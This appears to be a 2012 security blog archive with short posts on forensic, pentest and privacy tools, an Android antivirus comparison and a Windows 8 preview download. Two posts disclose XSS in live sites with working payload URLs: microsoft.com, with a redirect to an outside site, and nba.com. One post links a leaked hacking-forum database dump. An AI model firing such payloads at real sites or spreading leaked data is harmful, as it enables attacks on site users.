Wednesday, 7. March 2012
Mozilla Firefox - XSS
On Wednesday, 7. Mar 2012 in topic 'Vulnerabilities'
Microsoft's official website (microsoft.com) is vulnerable to Cross Site Scripting (XSS). The vulnerability is in the Products page URL.
hxxp://www.microsoft.com/en-us/together/possibilities.aspx?hdrFo=mthdr02'"-->alert('XSS');document.location.replace('http://ehackingnews.com')
http://www.microsoft.com/en-us/together/possibilities.aspx?hdrFo=mthdr02'"-->3Ealert('Simple XSS')
Code
hxxp://www.microsoft.com/en-us/together/possibilities.aspx?hdrFo=mthdr02'"-->alert("XSS")
by
flexxpoint
Mozilla Firefox new add-on called Collusion
On Wednesday, 7. Mar 2012 in topic 'News'
Mozilla Firefox has launched a new add-on called Collusion that enables users to see which advertisers are tracking their movements on the web.
Collusion is an experimental add-on for Firefox and allows you to see all the third parties that are tracking your movements across the Web. It will show, in real time, how that data creates a spider-web of interaction between companies and other trackers.
HOW TO FETCH USERNAME AND PASSWORD BY SOCIAL ENGINEERING TECHNOLOGIES
On Wednesday, 7. Mar 2012 in topic 'Tutorials'
by
ahaseckaser
DIY USB password generator
On Wednesday, 7. Mar 2012 in topic 'Tutorials'
Joonas Pihlajamaa is a programmer who solved this issue by using a USB HID stick that types a password stored in EEPROM. The device can also generate a new password with 10 characters just by pressing the CAPS button, which gives a new password quickly without the need to remember it. The programmer used an old 512 MB flash drive.
Download Source
http://codeandlife.com/data/usb_passgen.zip
Adobe SWF Investigator
On Wednesday, 7. Mar 2012 in topic 'Tools'
Adobe® SWF Investigator is the only comprehensive, cross-platform, GUI-based set of tools, which enables quality engineers, developers and security researchers to quickly analyze SWF files to improve the quality and security of their applications. With SWF Investigator, you can perform both static and dynamic analysis of SWF applications with just one toolset. SWF Investigator lets you quickly inspect every aspect of a SWF file from viewing the individual bits all the way through to dynamically interacting with a running SWF.
Download
http://labs.adobe.com/technologies/swfinvestigator/
Tuesday, 6. March 2012
Hackhound 2008-2012
On Tuesday, 6. Mar 2012 in topic 'News'
Latest Database pruned of any information can be found here ...
http://www.hackhound.org/HH-DB-2012-03-05.zip
IPB attachments here ...
http://www.hackhound.org/ipb-files
SMF attachments here (old forum) ...
http://www.hackhound.org/smf-files
Google app-inventor - AndroidappMaker
On Tuesday, 6. Mar 2012 in topic 'Android'
Google and MIT are pleased to announce the initial free and open-source release from Google of the App Inventor source code
Download
http://code.google.com/p/app-inventor-releases/downloads/list
Wiki Linux Mac
http://code.google.com/p/app-inventor-releases/wiki/BuildingAndRunning
1. Clone the Source!
2. Install dev-java/ant
3. Goto Appinventor-Dir bash: ant
4. bash: ant tests
5. Start the AppEngine Java Service (Download here: http://code.google.com/intl/de-DE/appengine/downloads.html#Download_the_Google_App_Engine_SDK)
6. bash: RunLocalBuildServer!
Wiki Windows
http://sites.jsoft.com/appinventor/home/gsuac/server/settingup/gsuar#TOC-your-war-folder
Which Android Security Tools Are Worth?
On Tuesday, 6. Mar 2012 in topic 'News'
Only 7 of the 41 virus scanners had detection rates above 90 percent, with over half of the remaining apps having detection rates under 40 percent. The top 7 apps were Avast Mobile Security, Dr. Web Anti-virus Light, F-Secure Mobile Security, IKARUS Mobile Security Lite, Lookout Mobile Security, Kaspersky Mobile Security Lite, and Zoner AntiVirus Free. Out of those 7, Kaspersky and F-Secure had the highest detection rates, followed by Avast.
Info
http://www.pcworld.com/businesscenter/article/251345/which_android_security_tools_are_worth_your_time.html
Monday, 5. March 2012
nba.com - XSS
On Monday, 5. Mar 2012 in topic 'Vulnerabilities'
Details:
Parameter successURL in /webAction?actionId=emailFormRandom^Name=&Email=&Comment=&=Submit&=Reset&ReferringURL=&emailTo=technicalsupport%40nba.com&emailFrom=technicalsupport%40nba.com&successURL=%2F&subject=NBA.com+404+Error+Message is vulnerable to "+onerror="alert(1)" XSS input.
Proof Of Concept:
hxxp://www.nba.com:80/webAction?actionId=emailFormRandom
oSpy- Sniffing Local Application Calls
On Monday, 5. Mar 2012 in topic 'Tools'
oSpy is a tool which aids in reverse-engineering software running on the Windows platform.
oSpy already intercepts one such API, which is the API used by MSN Messenger, Google Talk, etc. for encrypting/decrypting HTTPS data.
Download
http://code.google.com/p/ospy/downloads/list
Online Forensic Evidence Extractor (COFEE)
On Monday, 5. Mar 2012 in topic 'Forensic'
Microsoft has created Computer Online Forensic Evidence Extractor (COFEE), designed exclusively for use by law enforcement agencies. COFEE brings together a number of common digital forensics capabilities into a fast, easy-to-use, automated tool for first responders. And COFEE is being provided—at no charge—to law enforcement around the world.
With COFEE, law enforcement agencies without on-the-scene computer forensics capabilities can now more easily, reliably, and cost-effectively collect volatile live evidence. An officer with even minimal computer experience can be tutored—in less than 10 minutes—to use a pre-configured COFEE device. This enables the officer to take advantage of the same common digital forensics tools used by experts to gather important volatile evidence, while doing little more than simply inserting a USB device into the computer.
Info
http://www.microsoft.com/industry/government/solutions/cofee/default.aspx
Oxygen Forensic Suite
On Monday, 5. Mar 2012 in topic 'Forensic'
Besides the general data extracted by similar products, Oxygen Forensic Suite can extract a lot of unique information.
Using low-level protocols allows the program to extract: phone basic information and SIM-card data, contacts list, caller groups, speed dials, missed/outgoing/incoming calls, standard SMS/MMS/E-mail folders, custom SMS/MMS/E-mail folders, deleted SMS messages (with some restrictions), SMS Center timestamps, calendar events schedule, tasks, text notes, photos, videos, sounds, LifeBlog data (all main phone events with their geographical coordinates), Java applications, file system from phone memory and flash card, GPRS and Wi-Fi activity, voice records and much more. The list of supported features depends on the phone model.
Download
http://www.oxygen-forensic.com/de/download/
Friday, 2. March 2012
BackTrack 5 R2 - Download Now
On Friday, 2. Mar 2012 in topic 'Pentest'
Backtrack 5 R2 has finally been released with bug fixes, upgrades, and the addition of 42 new tools. It comes with the best custom-built 3.2.6 kernel and the best wireless support available at maximum speed. This release includes Metasploit 4.2.0 Community Edition, version 3.0 of the Social Engineer Toolkit, BeEF 0.4.3.2, and many other tool upgrades.
Download
http://www.backtrack-linux.org/downloads/
Security Analyzer
On Friday, 2. Mar 2012 in topic 'Tools'
Security Analyzer is a free program for the Windows operating system to assess the system’s security status. The application works in some regards identical to Microsoft’s Action Center control panel applet. Unlike Microsoft’s built-in tool, it provides additional information and options to see if the system is protected properly.
Download
http://www.itknowledge24.com/downloads/p
Ocster Backup Pro 7
On Friday, 2. Mar 2012 in topic 'Tools'
Ocster Backup Pro is a fully automatic backup solution that supports full PC backup (image backup), file backup, email backup (Outlook, Thunderbird), browser backup (Firefox, Chrome, Internet Explorer), and contacts backup. The application is very easy to use and includes a wizard that guides users who have no knowledge of, or are new to, backup programs through the desired tasks. Backups performed by Ocster Backup Pro can be stored on local drives, removable drives or on secure Ocster backup servers.
Info:
Visit promo page
https://www.ocster.com/unlock/obp7/en?edt=cbde11a
Enter your details
You will receive a confirmation mail
Web Servers - OnlineScanner
On Friday, 2. Mar 2012 in topic 'News'
brEWS (Basic Request Embedded Web Server Scanner) was designed to provide a simple web based tool to scan networks and identify Embedded Web Servers (EWSs). While there is no universally accepted definition, for our purposes, we define an EWS as follows:
Web server installed on the hardware during the manufacturing process (not an optional component)
Not designed for high performance
Limited functionality
Serves as an administrative interface to the host hardware
Info
http://brews.zscaler.com/getheaders.php
Thursday, 1. March 2012
Windows 8 Preview - ISO-Images
On Thursday, 1. Mar 2012 in topic 'Tools'
Download ISO-Images
English
64-Bit (x64) (3.1 GB) SHA-1 hash – 1288519C5035BCAC83CBFA23A33038CCF5522749
http://iso.esd.microsoft.com/WCPDL/BD1B8A49393E30CC9C4E5C88457D73E964F1F3B18/Windows8-ConsumerPreview-64bit-English.iso
32-Bit (x86) (2.3 GB) SHA-1 hash – E91ED665B01A46F4344C36D9D88C8BF78E9A1B39
http://iso.esd.microsoft.com/WCPDL/BD1B8A49393E30CC9C4E5C88457D73E964F1F3B18/Windows8-ConsumerPreview-32bit-English.iso
Product Key: DNJXJ-7XBW8-2378T-X22TX-BKG7J